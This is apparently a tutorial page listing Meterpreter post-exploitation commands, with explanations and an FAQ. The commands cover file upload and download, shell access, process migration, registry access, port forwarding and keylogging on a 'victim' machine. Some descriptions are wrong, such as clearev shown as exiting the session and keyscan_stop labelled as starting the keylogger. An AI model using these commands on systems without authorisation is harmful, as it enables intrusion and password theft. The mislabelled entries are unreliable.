Meterpreter commands
Basic and file handling commands
meterpreter> sysinfo
Display System Information:
The "sysinfo" command grants you access to vital system information on the target machine. It provides key details such as the operating system, architecture, and system uptime.
meterpreter> ps
List and Display Running Processes:
With the "ps" command, you can acquire a comprehensive list of all running processes on the compromised system. Understanding the active processes aids in assessing potential vulnerabilities.
meterpreter> kill
Terminate a Running Process:
To halt a running process on the target system, employ the "kill" command. This can be invaluable when dealing with suspicious or malicious processes.
meterpreter> getuid
Display User ID:
Understanding the current user's privileges is crucial. The "getuid" command allows you to retrieve the user ID of the compromised system.
merterpreter> upload "file name"
Upload a File:
Transferring files to the victim device becomes seamless with the "upload" command. This facilitates the deployment of additional tools or payloads for further exploitation.
meterpreter> download "file name"
Download Files from the Target:
Conversely, you can retrieve files from the compromised system using the "download" command. This enables you to extract sensitive information or configuration files.
meterpreter> pwd or lpwd
Print Working Directory (Local / Remote):
Keeping track of the working directory, whether local or remote, is simplified with the "pwd" and "lpwd" commands.
meterpreter> cd or lcd
Change Directory (Local or Remote):
Navigation becomes easier with the "cd" and "lcd" commands, allowing you to move between directories on the target system or your local machine.
meterpreter> cat
Display File Content:
Need to examine the contents of a file? The "cat" command lets you view the content of a specific file on the compromised system.
meterpreter> bglist
Show Background Running Scripts:
Monitoring background scripts becomes convenient using the "bglist" command, which displays all scripts currently running in the background.
meterpreter> bgrun
Run a Script in the Background:
To execute a script in the background, the "bgrun" command proves invaluable, ensuring discreet operation.
meterpreter> bgkill
Terminate a Background Process:
If the need arises, you can terminate a background process using the "bgkill" command, maintaining control over the operation.
meterpreter> background
Move Active Session to Background:
With the "background" command, you can gracefully move the active Meterpreter session to the background, allowing simultaneous execution of other commands.
merterpreter> edit
Edit a File in vi Editor:
The "edit" command enables you to modify the content of a file using the vi editor.
meterpreter> shell
Access the Shell on the Target Machine:
For more direct control, use the "shell" command to gain direct access to the target machine's shell.
meterpreter> migrate
Switch to Another Process:
In case you want to switch to a different process on the target system, the "migrate" command facilitates smooth transitioning.
meterpreter> idletime
Display Idle Time of User:
Discovering the idle time of the current user is crucial for planning your actions carefully. The "idletime" command fulfills this purpose.
meterpreter> screenshot
Take a Screenshot:
A picture is worth a thousand words, and the "screenshot" command allows you to capture the current screen for investigation.
meterpreter> clearev
Exit the Meterpreter Session:
When you've accomplished your objectives, exit the Meterpreter session using the "exit" or "quit" command.
meterpreter> exit / quit
Exit the Meterpreter Session:
When you've accomplished your objectives, exit the Meterpreter session using the 'exit" or `"uit" command.
meterpreter> shutdown / reboot
Restart system:
With the "shutdown or"reboot" command you can shutdown your victim device.
meterpreter> use
Extension Load:
With the `use` command, you can load extensions to extend the functionality of Meterpreter.
meterpreter> channel
Show Active Channels:
The `channel` command provides information on active channels, aiding in channel management.
Process handling commands
meterpreter> getpid:
Display the Process ID:
Retrieve the Process ID of a specific process with the `getpid` command.
meterpreter> getuid:
Display the User ID:
The `getuid` command also allows you to view the user ID of the target system.
meterpreter> ps:
Display Running Processes:
Similar to the previous `ps` command, this variant also shows the running processes on the compromised machine.
meterpreter> kill:
Stop and Terminate a Process:
Use the `kill` command to stop and terminate a process, allowing for focused control.
meterpreter> getprivs
Show Multiple Privileges as Possible:
Discover the various privileges available with the `getprivs` command, enhancing your options during exploitation.
meterpreter> reg
Access Target Machine Registry:
With the `reg` command, you can access the registry of the compromised system, accessing valuable configuration data.
meterpreter> Shell
Access Target Machine Shell:
Gain direct access to the shell of the target machinComma this `shell` Command.
meterpreter> execute:
Run a Specified Command:
Run a specified command with the `execute` command, enabling custom actions on the target system.
meterpreter> migrate:
Move to a Given Destination Process ID:
By using the `migrate` command with a destination process ID, you can switch your Meterpreter session to that process.
Networking commands
meterpreter> ipconfig:
Show Network Interface Configuration:
Retrieve the network interface configuration of the target system using the `ipconfig` command.
meterpreter> portfwd:
Forward Packets:
The `portfwd` command allows you to forward packets on the target machine, facilitating network manipulation.
meterpreter> route:
View / Edit Network Routing Table:
With the `route` command, you can view and edit the network routing table on the compromised system.
Interface / output commands
meterpreter> getdesktop
Display Current Desktop:
Retrieve information about the current desktop environment using the `getdesktop` command.
meterpreter> keyscan_start:
Start Keylogger in Target Machine:
For covert data acquisition, initiate a keylogger on the target machine with the `keyscan_start` command.
meterpreter> keyscan_stop
Start Keylogger in Target Machine:
When the need arises, terminate the keylogger using the `keyscan_stop` command.
meterpreter> set_desktop
Configure Desktop:
Customize the desktop environment on the compromised system with the `set_desktop` command.
meterpreter> enumdesktops
Show All Available Desktops:
The `enumdesktops` command displays all available desktops on the target system, aiding in user interaction analysis.
meterpreter> keyscan_dump
Extract Keylogger Contents:
To gather valuable data acquired by the keylogger, use the keyscan_dump command. This command allows you to extract and review the logged keystrokes, potentially revealing sensitive information and passwords used on the target machine.
👇Meterpreter cmd.pdf👇
FAQs
Q1: What does the "sysinfo" command do in Meterpreter?
A1: The "sysinfo" command shows important information about the target computer, such as its operating system, architecture, and how long it has been running.
Q2: How can I stop a running process on the compromised system?
A2: You can stop a process using the "kill" command in Meterpreter. This is helpful when dealing with suspicious or harmful programs.
Q3: What does the "upload" command do in Meterpreter?
A3: The "upload" command lets you easily send files to the victim's device. It's useful for adding extra tools or payloads to exploit the system.
Q4: In Meterpreter, how do I modify the working directory?
A4: The "cd" and "lcd" commands in Meterpreter allow you to navigate between directories on the target system or your own workstation.
Q5: How do I access a file's contents on the compromised system?
A5: The Meterpreter "cat" command displays the contents of a specific file on the hacked system.
Q6: How can I run a script in the background with Meterpreter?
A6: You can use the "bgrun" command in Meterpreter to execute a script in the background, so it operates discreetly.
Q7: How do I gain direct access to the target machine's shell with Meterpreter?
A7: Use the "shell" command in Meterpreter to directly access the target machine's shell for more control.
Q8. How do I capture a screenshot of the current screen for investigation?
A8: The "screenshot" command in Meterpreter allows you to take a picture of what's currently displayed on the compromised system.
Q9: How can I move the active Meterpreter session to the background?
A9: You can gracefully move the active session to the background using the "background" command in Meterpreter, so you can run other commands simultaneously.
Q10: What does the "getpid" command do in Meterpreter?
A10: The "getpid" command in Meterpreter lets you find out the Process ID of a specific running process on the target system.
Q11: How do I access the registry of the compromised system with Meterpreter?
A11: Use the "reg" command in Meterpreter to access the registry of the compromised system, where important configuration data is stored.
Q12: What does the "ipconfig" command do in Meterpreter?
A12: The "ipconfig" command in Meterpreter shows you the network interface configuration of the target system.
Q13: How can I forward packets on the target machine with Meterpreter?
A13: Use the "portfwd" command in Meterpreter to forward packets on the target machine, which helps with network manipulation.
Q14: How do I use Meterpreter to get information about the current desktop environment?
A14: In Meterpreter, use the "getdesktop" command to view information about the current desktop environment on the target system.
Q15: How can I start a keylogger on the target machine with Meterpreter?
A15: Use the "keyscan_start" command in Meterpreter to start a keylogger on the target machine, which secretly records keystrokes.
Q16: How do I stop the keylogger on the target machine with Meterpreter?
A16: When needed, you can stop the keylogger using the "keyscan_stop" command in Meterpreter.
Q17: How can I customize the desktop environment on the compromised system with Meterpreter?
A17: Use the "set_desktop" command in Meterpreter to configure the desktop environment on the compromised system according to your preferences.
Q18: What does the "enumdesktops" command in Meterpreter do?
A18: The "enumdesktops" command in Meterpreter shows you all available desktops on the target system, which helps with analyzing user interaction.
Q19: How do I extract and review logged keystrokes with Meterpreter?
A19: You can use the "keyscan_dump" command in Meterpreter to gather important data recorded by the keylogger and review the logged keystrokes. This can potentially reveal sensitive information and passwords used on the target machine.
